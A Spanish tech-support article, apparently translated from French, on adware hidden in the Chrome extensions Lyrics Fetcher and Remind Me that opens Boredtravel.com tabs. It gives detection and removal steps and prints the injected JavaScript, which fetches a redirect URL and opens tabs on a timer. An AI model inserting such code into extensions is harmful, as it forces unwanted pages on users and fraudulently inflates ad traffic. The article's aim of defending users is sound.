Un adware que abre ventanas emergentes a Boredtravel.com se ha deslizado en algunas extensiones de Chrome. Aquí se explica cómo detectar y eliminar este virus.
Identificar y eliminar el adware Boredtravel.com
Se ha insertado un script malicioso en la última actualización de varias extensiones de Chrome. Este script abre el sitio Boredtravel.com sin el conocimiento de los usuarios, a intervalos regulares de tiempo. Las extensiones infectadas por este script son Lyrics Fetcher y Remind Me, del útil desarrollador webwebtech.
Este adware no es peligroso, ya que solo abre una página publicitaria. Sin embargo, es inquietante dejar que ocurra esta dudosa práctica.
Identifica el adware
Para identificar el adware, simplemente analice el comportamiento de su navegador:
- Cierre Google Chrome y reinícielo.
- Espere 6 minutos después de abrir el navegador. Si su navegador está infectado, se abrirá una pestaña en la página boredtravel.com después de exactamente 6 minutos. Esto también ocurrirá cada 4 horas.
Eliminar adware
La eliminación es simple y rápida:
- Verifique sus extensiones de Chrome: si una o más de las extensiones mencionadas anteriormente están instaladas, entonces su navegador probablemente esté infectado.
- Para eliminar este adware, simplemente deshabilite o elimine las extensiones en cuestión.
Se han identificado casos para extensiones Letra de Fetcher y Recuérdame, pero pueden no ser los únicos. Es posible que el adware también esté presente en la extensión Modo bebé, una extensión del mismo desarrollador.
No está claro si el desarrollador de esta extensión agregó deliberadamente el script malicioso, o si fue realizado por un hacker. Como precaución, le recomendamos que deshabilite o elimine todas las extensiones de este desarrollador.
Las extensiones han sido reportadas a Google, sabremos más pronto. Si otras extensiones tienen la misma preocupación, no dude en hacérnoslo saber.
Reemplazar extensiones
Aquí hay algunas extensiones alternativas:
- Letras Fetcher puede ser reemplazado por Letra Here de Rob W o Auto Lyric Show
- Recordarme puede ser reemplazado por Recordatorio Pi
El trabajo de Boredtravel.com
El principio es simple, el desarrollador o un hacker ha agregado un script en las extensiones en cuestión. Este script, que se ejecuta en segundo plano, indica al navegador que abra una página publicitaria a intervalos regulares. El objetivo para el desarrollador o hacker es que la página de destino se abra varias veces. Esto permite aumentar el número de visitas del sitio Boredtravel.com y aumentar los ingresos relacionados.
Aquí está el código que se ha agregado en la extensión. Agregué comentarios verdes para que entiendas mejor
<script>
// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
setTimeout(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
/* cette URL génère un lien du type
https://ourshort.com/?g/BNHzHJJ */
async: false,
dataType: 'json',
success: function (data) {
//ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
intervalWebsite() /* appel de la fonction qui ouvre
un pop-up toutes les 4 heures */
}
});
}, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min
// fonction qui ouvre un pop-up toutes les 4 heures
function intervalWebsite() {
setInterval(function () {
$.ajax({
url: "https://demo7530752.mockable.io/url",
// comme dans la première fonction
async: false,
dataType: 'json',
success: function (data) {
// comme dans la première fonction
var newURL = data.msg;
chrome.tabs.create({ url: newURL }); ;
}
});
}, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
}
</script>
Fuentes: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/
Lea también: Habilite la autenticación dual en sus cuentas en línea (2FA) https://currenttrends.fr/internet/2fa-double-authentification/
Tengo este problema pero no conozco ninguna de las extensiones que mencionaste.